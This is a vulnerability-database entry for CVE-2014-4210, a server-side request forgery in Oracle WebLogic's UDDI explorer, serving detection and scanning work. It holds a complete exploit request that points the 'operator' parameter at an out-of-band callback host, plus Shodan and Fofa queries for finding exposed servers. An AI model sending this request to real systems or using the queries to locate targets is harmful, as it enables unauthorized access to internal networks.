🔙 목록으로 돌아가기

CVE-2014-4210: Oracle Weblogic - Server-Side Request Forgery

TitleOracle Weblogic - Server-Side Request Forgery
Authorprincechaddha
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.
RemediationApply the latest patches and updates provided by Oracle to fix the SSRF vulnerability
CVSS Score5
EPSS Score0.94152
CVE IDCVE-2014-4210
CWE IDNVD-CWE-noinfo
Shodan Querytitle:"Weblogic"http.title:"weblogic"http.html:"weblogic application server"
Fofa Querytitle="weblogic"body="weblogic application server"
Tags cve2014 cve seclists weblogic oracle ssrf oast xss vuln

🔍 Vulnerability Description

An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.

🌐 HTTP Request

GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey&txtSearchfor&selfor=Business+location&btnSubmit=Search&operator=http://d5jqqv1le0o2oc29b4l0exfw63byidtrk.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-4210.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-4210.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A